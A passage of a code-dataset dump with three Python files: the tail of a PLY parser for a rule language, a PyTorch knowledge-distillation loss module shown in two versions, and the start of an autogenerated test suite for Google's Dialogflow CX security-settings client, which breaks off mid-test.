p[0] = {'dst': p[3], 'src': p[1]}
def p_action_yield_multiset_tuple(p):
p[0] = {'dst': p[3], 'src': p[1]}
def p_action_yield_hll_tuple(p):
p[0] = {'dst': p[3], 'src': p[1]}
def p_ids(p):
if len(p) > 2:
p[0] = p[1] + [p[3]]
else:
p[0] = [p[1]]
def p_yieldable(p):
p[0] = {'_k': 'field', 'name': p[1]}
def p_yieldable_start_ts(p):
p[0] = {'_k': 'window_ref'}
def p_yieldable_fcall(p):
p[0] = p[1]
def p_yieldable_windowref(p):
p[0] = {'_k': 'window_ref', 'ref': p[3]}
def p_fcall(p):
p[0] = {'_k': 'fcall',
'name': p[1],
'args': p[3]}
def p_arglist(p):
if len(p) == 2:
p[0] = [p[1]]
elif len(p) == 4:
p[0] = p[1] + [p[3]]
def p_arg_id(p):
p[0] = {'_k': 'field', 'name': p[1]}
def p_arg_scalar(p):
p[0] = {'_k': 'param', 'name': p[1]}
def p_arg_fcall(p):
p[0] = p[1]
def p_arg_ts(p):
p[0] = {'_k': 'window_ref', 'ref': p[3]}
def p_arg_literal(p):
p[0] = {'_k': 'literal', 'value': p[1]}
def p_transition(p):
p[0] = p[1]
def p_transition2(p):
p[0] = p[1]
def p_error(p):
if p is None or p.lineno == -1:
raise ParseError(message="Syntax error: unexpected EOF")
else:
raise ParseError(message="Syntax error at line %s position %s: %s %s" % (p.lineno, p.lexpos, type_names.get(p.type, p.type), p.value),
lineno=p.lineno,
lexpos=p.lexpos,
type=p.type,
value=p.value)
def assign_numeric_labels(rules, n = 0):
for r in rules:
r['n'] = n
n += 1
if 'rules' in r:
n = assign_numeric_labels(r['rules'], n)
r['outer'] = n
return n
def flatten_rules(rules):
for r in rules:
nested = r.get('rules')
if nested:
del r['rules']
yield r
if nested:
for r in flatten_rules(nested):
yield r
reserved_actions = ['repeat', 'quit']
def convert_transitions(rules):
numeric = {r['name'] : r['n'] for r in rules}
for r in rules:
if 'after' in r:
if 'action' in r['after']:
action = r['after']['action']
if action not in reserved_actions:
r['after']['action'] = 'restart-from-here(%d)' % numeric[action]
else:
r['after']['action'] = 'restart-from-here'
for c in r.get('clauses', []):
if 'action' in c:
action = c['action']
if action not in reserved_actions:
if action not in numeric:
raise ParseError(message='Label not found: %s' % action, lineno=c.get('lineno'), lexpos=c.get('lexpos'))
c['action'] = 'restart-from-next(%d)' % numeric[action]
else:
if r['n'] >= 1:
raise ParseError(message='Consider adding repeat here', lineno=c.get('lineno'), lexpos=c.get('lexpos'))
else:
c['action'] = 'repeat'
import ply.yacc as yacc
parser = yacc.yacc()
lexer = lex.lex()
lexer = IndentLexer(lexer)
import sys
import json
EXPR_TYPE_CONST = 'const'
EXPR_TYPE_IN_VAR = 'in_var'
EXPR_TYPE_TIMESTAMP_OP_VAR = 'timestamp_op_var'
EXPR_TYPE_TIMESTAMP_OP_CONST = 'timestamp_op_const'
def is_variable(n):
if n == '':
return False
return n[0] in '#&%$@'
def parse_expr(expr_string):
m = re.match('((>=)|(<=)|(==)|(<)|(>))(.+)', expr_string)
if m:
if is_variable(m.group(7)):
return (EXPR_TYPE_TIMESTAMP_OP_VAR, (m.group(1), m.group(7)))
else:
return (EXPR_TYPE_TIMESTAMP_OP_CONST, (m.group(1), m.group(7)))
if is_variable(expr_string):
return (EXPR_TYPE_IN_VAR, (expr_string,))
else:
return (EXPR_TYPE_CONST, (expr_string,))
def get_var_fields(rules):
res = {}
for rule in rules:
for clause in rule.get('clauses', []):
for field, conditions in clause.get('attrs', {}).items():
for expr in conditions:
t, r = parse_expr(expr)
if t == EXPR_TYPE_IN_VAR:
res[r[0]] = field
elif t == EXPR_TYPE_TIMESTAMP_OP_VAR:
res[r[1]] = field
return res
def compile_tr(text):
lexer.input(text)
result = parser.parse(lexer = lexer)
assign_numeric_labels(result['rules'])
flat_rules = list(flatten_rules(result['rules']))
convert_transitions(flat_rules)
if 'groupby' in result:
return { 'rules' : flat_rules, 'groupby': result['groupby']}
else:
return {'rules' : flat_rules}
def syntax_check(text):
try:
parser = yacc.yacc()
lexer = lex.lex()
lexer = IndentLexer(lexer)
sys.stderr.write("text %s\n" % text)
lexer.input(text)
result = parser.parse(lexer=lexer)
assign_numeric_labels(result['rules'])
flat_rules = list(flatten_rules(result['rules']))
convert_transitions(flat_rules)
return []
except ParseError as e:
sys.stderr.write("exception %s %s\n" % (e.message, lexer.lexer.lineno))
return [{'message' : e.message, 'info' : e.info}]
if __name__ == '__main__':
if len(sys.argv) == 1:
flat_rules = compile_tr(sys.stdin.read())
print(json.dumps(flat_rules))
elif sys.argv[1] == 'lex':
lexer.input(sys.stdin.read())
for t in lexer:
print(t.lineno, t.type, t.value)
elif sys.argv[1] == 'gen':
pass
| true | true |
1c3c7c14e4175d4c1eea50ac615d458cd27cbcdb | 1,011 | py | Python | loss/distill.py | SinterCVer/pytorch-keypoints-det | 9ec271d37a98740998d4b146634747520a0b9f43 | [
"MIT"
] | 1 | 2021-09-20T07:03:18.000Z | 2021-09-20T07:03:18.000Z | loss/distill.py | sinterwong/pytorch-keypoints-det | 9ec271d37a98740998d4b146634747520a0b9f43 | [
"MIT"
] | null | null | null | loss/distill.py | sinterwong/pytorch-keypoints-det | 9ec271d37a98740998d4b146634747520a0b9f43 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
class KLDivLoss():
    """Knowledge-distillation loss: temperature-softened KL divergence
    between student and teacher logits, blended with cross-entropy on the
    hard labels.

    alpha: weight of the distillation term; (1 - alpha) weights the CE term.
    T:     softmax temperature; the KD term is rescaled by alpha * T**2.
    """

    def __init__(self, alpha, T):
        # Bug fix: super(KLDivLoss).__init__() built an *unbound* super
        # object and initialised that, silently skipping the parent's
        # __init__.  Passing self runs the real parent initializer.
        super(KLDivLoss, self).__init__()
        self.alpha = alpha
        self.T = T
        self.KDLoss = nn.KLDivLoss()

    def __call__(self, outputs, t_outputs, labels):
        # KL(student_T || teacher_T) * alpha*T^2  +  CE(student, labels) * (1 - alpha)
        # nn.KLDivLoss expects log-probabilities for the input and plain
        # probabilities for the target.
        return self.KDLoss(F.log_softmax(outputs / self.T, dim=1), F.softmax(t_outputs / self.T, dim=1)) * \
               (self.alpha * self.T * self.T) + \
               F.cross_entropy(outputs, labels) * (1. - self.alpha)
class DistillFeatureMSELoss():
    """Sum of per-feature-map MSE losses between student and teacher
    intermediate outputs, scaled by *alpha*.

    NOTE: ``[nn.MSELoss(...)] * num_df`` repeats the *same* (stateless) loss
    instance num_df times; harmless here and kept for compatibility.
    """

    def __init__(self, reduction="mean", num_df=3, alpha=10.):
        # Bug fix: super(DistillFeatureMSELoss).__init__() created an
        # unbound super object and never ran the parent's __init__;
        # passing self is the correct idiom.
        super(DistillFeatureMSELoss, self).__init__()
        self.criterion = [nn.MSELoss(reduction=reduction)] * num_df
        self.alpha = alpha

    def __call__(self, s_out, t_out):
        # One scalar loss per feature map; summed on CUDA when the inputs
        # live there, on CPU otherwise.
        fs_loss = [loss_fn(s_out[i], t_out[i]) for i, loss_fn in enumerate(self.criterion)]
        return torch.sum(torch.cuda.FloatTensor(fs_loss) if s_out[0].is_cuda else torch.Tensor(fs_loss)) * self.alpha
| 36.107143 | 117 | 0.642928 | import torch
import torch.nn as nn
import torch.nn.functional as F
# NOTE(review): this is a mechanically comment-stripped duplicate of the
# KLDivLoss / DistillFeatureMSELoss definitions earlier in this dump (a
# dataset "content_no_comment" column).  It carries the same defect: the
# super(Cls).__init__() calls build unbound super objects and never run the
# parent initializer.  Kept byte-identical here; fix at the primary copy.
class KLDivLoss():
    def __init__(self, alpha, T):
        super(KLDivLoss).__init__()
        self.alpha = alpha
        self.T = T
        self.KDLoss = nn.KLDivLoss()
    def __call__(self, outputs, t_outputs, labels):
        # KD term (scaled by alpha*T^2) plus (1-alpha)-weighted cross-entropy.
        return self.KDLoss(F.log_softmax(outputs / self.T, dim=1), F.softmax(t_outputs / self.T, dim=1)) * \
               (self.alpha * self.T * self.T) + \
               F.cross_entropy(outputs, labels) * (1. - self.alpha)
class DistillFeatureMSELoss():
    def __init__(self, reduction="mean", num_df=3, alpha=10.):
        super(DistillFeatureMSELoss).__init__()
        self.criterion = [nn.MSELoss(reduction=reduction)] * num_df
        self.alpha = alpha
    def __call__(self, s_out, t_out):
        # Per-feature-map MSE losses summed on the inputs' device, * alpha.
        fs_loss = [loss_fn(s_out[i], t_out[i]) for i, loss_fn in enumerate(self.criterion)]
        return torch.sum(torch.cuda.FloatTensor(fs_loss) if s_out[0].is_cuda else torch.Tensor(fs_loss)) * self.alpha
| true | true |
1c3c7c6ddb41c8e4400d1cc180167d9c5a39ff0d | 103,009 | py | Python | google/cloud/dialogflow/cx/v3beta1/dialogflow-cx-v3beta1-py/tests/unit/gapic/dialogflowcx_v3beta1/test_security_settings_service.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 7 | 2021-02-21T10:39:41.000Z | 2021-12-07T07:31:28.000Z | google/cloud/dialogflow/cx/v3beta1/dialogflow-cx-v3beta1-py/tests/unit/gapic/dialogflowcx_v3beta1/test_security_settings_service.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 6 | 2021-02-02T23:46:11.000Z | 2021-11-15T01:46:02.000Z | google/cloud/dialogflow/cx/v3beta1/dialogflow-cx-v3beta1-py/tests/unit/gapic/dialogflowcx_v3beta1/test_security_settings_service.py | googleapis/googleapis-gen | d84824c78563d59b0e58d5664bfaa430e9ad7e7a | [
"Apache-2.0"
] | 4 | 2021-01-28T23:25:45.000Z | 2021-08-30T01:55:16.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import SecuritySettingsServiceAsyncClient
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import SecuritySettingsServiceClient
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import pagers
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service import transports
from google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.base import _GOOGLE_AUTH_VERSION
from google.cloud.dialogflowcx_v3beta1.types import security_settings
from google.cloud.dialogflowcx_v3beta1.types import security_settings as gcdc_security_settings
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
import google.auth
# TODO(busunkim): Once google-auth >= 1.25.0 is required transitively
# through google-api-core:
# - Delete the auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
    """Dummy mTLS client-certificate provider used by the tests below."""
    return (b"cert bytes", b"key bytes")
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
    """Return the client's DEFAULT_ENDPOINT, substituting a dummy
    non-localhost host when the default points at localhost (so
    mTLS-endpoint derivation can still be exercised in tests)."""
    endpoint = client.DEFAULT_ENDPOINT
    if "localhost" in endpoint:
        return "foo.googleapis.com"
    return endpoint
def test__get_default_mtls_endpoint():
    """_get_default_mtls_endpoint inserts ".mtls" into *.googleapis.com
    hosts (idempotently) and leaves None and non-Google hosts untouched."""
    api_endpoint = "example.googleapis.com"
    api_mtls_endpoint = "example.mtls.googleapis.com"
    sandbox_endpoint = "example.sandbox.googleapis.com"
    sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
    non_googleapi = "api.example.com"
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(None) is None
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
    assert SecuritySettingsServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [
    SecuritySettingsServiceClient,
    SecuritySettingsServiceAsyncClient,
])
def test_security_settings_service_client_from_service_account_info(client_class):
    """from_service_account_info builds credentials from the parsed
    service-account dict and targets the default Dialogflow host."""
    creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
        factory.return_value = creds
        info = {"valid": True}
        client = client_class.from_service_account_info(info)
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)
        assert client.transport._host == 'dialogflow.googleapis.com:443'
@pytest.mark.parametrize("transport_class,transport_name", [
    (transports.SecuritySettingsServiceGrpcTransport, "grpc"),
    (transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_service_account_always_use_jwt(transport_class, transport_name):
    """Transports call with_always_use_jwt_access(True) when self-signed
    JWTs are requested, and never call it when they are not."""
    with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
        creds = service_account.Credentials(None, None, None)
        transport = transport_class(credentials=creds, always_use_jwt_access=True)
        use_jwt.assert_called_once_with(True)
    with mock.patch.object(service_account.Credentials, 'with_always_use_jwt_access', create=True) as use_jwt:
        creds = service_account.Credentials(None, None, None)
        transport = transport_class(credentials=creds, always_use_jwt_access=False)
        use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [
    SecuritySettingsServiceClient,
    SecuritySettingsServiceAsyncClient,
])
def test_security_settings_service_client_from_service_account_file(client_class):
    """Both from_service_account_file() and its from_service_account_json() alias
    must build clients using the factory's credentials and the default host."""
    creds = ga_credentials.AnonymousCredentials()
    # Patch the factory so the dummy path is never actually read from disk.
    with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
        factory.return_value = creds
        client = client_class.from_service_account_file("dummy/file/path.json")
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)
        client = client_class.from_service_account_json("dummy/file/path.json")
        assert client.transport._credentials == creds
        assert isinstance(client, client_class)
        assert client.transport._host == 'dialogflow.googleapis.com:443'
def test_security_settings_service_client_get_transport_class():
    """get_transport_class() must resolve to a known transport by default and
    to the gRPC transport when asked for "grpc" explicitly."""
    supported = [
        transports.SecuritySettingsServiceGrpcTransport,
    ]
    default_transport = SecuritySettingsServiceClient.get_transport_class()
    assert default_transport in supported
    named_transport = SecuritySettingsServiceClient.get_transport_class("grpc")
    assert named_transport == transports.SecuritySettingsServiceGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(SecuritySettingsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceClient))
@mock.patch.object(SecuritySettingsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceAsyncClient))
def test_security_settings_service_client_client_options(client_class, transport_class, transport_name):
    """ClientOptions and GOOGLE_API_USE_MTLS_ENDPOINT must drive how the
    transport is constructed (endpoint choice, quota project, error cases)."""
    # Check that if channel is provided we won't create a new one.
    with mock.patch.object(SecuritySettingsServiceClient, 'get_transport_class') as gtc:
        transport = transport_class(
            credentials=ga_credentials.AnonymousCredentials()
        )
        client = client_class(transport=transport)
        gtc.assert_not_called()
    # Check that if channel is provided via str we will create a new one.
    with mock.patch.object(SecuritySettingsServiceClient, 'get_transport_class') as gtc:
        client = client_class(transport=transport_name)
        gtc.assert_called()
    # Check the case api_endpoint is provided.
    options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
    with mock.patch.object(transport_class, '__init__') as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host="squid.clam.whelk",
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "never".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
        with mock.patch.object(transport_class, '__init__') as patched:
            patched.return_value = None
            client = client_class()
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "always".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
        with mock.patch.object(transport_class, '__init__') as patched:
            patched.return_value = None
            client = client_class()
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_MTLS_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
    # unsupported value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
        with pytest.raises(MutualTLSChannelError):
            client = client_class()
    # Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
        with pytest.raises(ValueError):
            client = client_class()
    # Check the case quota_project_id is provided
    options = client_options.ClientOptions(quota_project_id="octopus")
    with mock.patch.object(transport_class, '__init__') as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id="octopus",
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc", "true"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio", "true"),
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc", "false"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(SecuritySettingsServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceClient))
@mock.patch.object(SecuritySettingsServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(SecuritySettingsServiceAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_security_settings_service_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
    """With GOOGLE_API_USE_MTLS_ENDPOINT="auto", the client must switch to the
    mTLS endpoint only when GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" AND a
    client certificate (explicit or from ADC) is available."""
    # This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
    # mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
    # Check the case client_cert_source is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
        options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
        with mock.patch.object(transport_class, '__init__') as patched:
            patched.return_value = None
            client = client_class(client_options=options)
            if use_client_cert_env == "false":
                expected_client_cert_source = None
                expected_host = client.DEFAULT_ENDPOINT
            else:
                expected_client_cert_source = client_cert_source_callback
                expected_host = client.DEFAULT_MTLS_ENDPOINT
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=expected_host,
                scopes=None,
                client_cert_source_for_mtls=expected_client_cert_source,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case ADC client cert is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
        with mock.patch.object(transport_class, '__init__') as patched:
            with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
                with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
                    # Read the endpoints off the class: the original read them off
                    # `client`, which is not assigned until below and only worked
                    # because the binding leaked from the previous `with` block.
                    # DEFAULT_ENDPOINT / DEFAULT_MTLS_ENDPOINT are class attributes,
                    # so the values are identical.
                    if use_client_cert_env == "false":
                        expected_host = client_class.DEFAULT_ENDPOINT
                        expected_client_cert_source = None
                    else:
                        expected_host = client_class.DEFAULT_MTLS_ENDPOINT
                        expected_client_cert_source = client_cert_source_callback
                    patched.return_value = None
                    client = client_class()
                    patched.assert_called_once_with(
                        credentials=None,
                        credentials_file=None,
                        host=expected_host,
                        scopes=None,
                        client_cert_source_for_mtls=expected_client_cert_source,
                        quota_project_id=None,
                        client_info=transports.base.DEFAULT_CLIENT_INFO,
                        always_use_jwt_access=True,
                    )
    # Check the case client_cert_source and ADC client cert are not provided.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
        with mock.patch.object(transport_class, '__init__') as patched:
            with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
                patched.return_value = None
                client = client_class()
                patched.assert_called_once_with(
                    credentials=None,
                    credentials_file=None,
                    host=client.DEFAULT_ENDPOINT,
                    scopes=None,
                    client_cert_source_for_mtls=None,
                    quota_project_id=None,
                    client_info=transports.base.DEFAULT_CLIENT_INFO,
                    always_use_jwt_access=True,
                )
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_client_options_scopes(client_class, transport_class, transport_name):
    """Scopes passed via ClientOptions must be forwarded verbatim to the transport."""
    # Check the case scopes are provided.
    options = client_options.ClientOptions(
        scopes=["1", "2"],
    )
    with mock.patch.object(transport_class, '__init__') as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=["1", "2"],
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
    (SecuritySettingsServiceClient, transports.SecuritySettingsServiceGrpcTransport, "grpc"),
    (SecuritySettingsServiceAsyncClient, transports.SecuritySettingsServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_security_settings_service_client_client_options_credentials_file(client_class, transport_class, transport_name):
    """A credentials file named in ClientOptions must be forwarded to the transport."""
    # Check the case credentials file is provided.
    options = client_options.ClientOptions(
        credentials_file="credentials.json"
    )
    with mock.patch.object(transport_class, '__init__') as patched:
        patched.return_value = None
        client = client_class(client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file="credentials.json",
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
def test_security_settings_service_client_client_options_from_dict():
    """Client options given as a plain dict must configure the transport the
    same way a ClientOptions instance would."""
    with mock.patch('google.cloud.dialogflowcx_v3beta1.services.security_settings_service.transports.SecuritySettingsServiceGrpcTransport.__init__') as grpc_transport:
        grpc_transport.return_value = None
        client = SecuritySettingsServiceClient(
            client_options={'api_endpoint': 'squid.clam.whelk'}
        )
        grpc_transport.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host="squid.clam.whelk",
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
def test_create_security_settings(transport: str = 'grpc', request_type=gcdc_security_settings.CreateSecuritySettingsRequest):
    """CreateSecuritySettings (sync): the stub is called once with the request
    and the mocked response fields round-trip into the returned proto."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = gcdc_security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
            retention_window_days=2271,
        )
        response = client.create_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, gcdc_security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_create_security_settings_from_dict():
    """Re-run the sync CreateSecuritySettings test with a dict request."""
    test_create_security_settings(request_type=dict)
def test_create_security_settings_empty_call():
    """Calling create_security_settings() with no arguments must still send a
    default CreateSecuritySettingsRequest."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        client.create_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_create_security_settings_async(transport: str = 'grpc_asyncio', request_type=gcdc_security_settings.CreateSecuritySettingsRequest):
    """CreateSecuritySettings (async): the stub is awaited with the request and
    the mocked response fields round-trip into the returned proto."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
        ))
        response = await client.create_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.CreateSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, gcdc_security_settings.SecuritySettings)
    assert response.name == 'name_value'
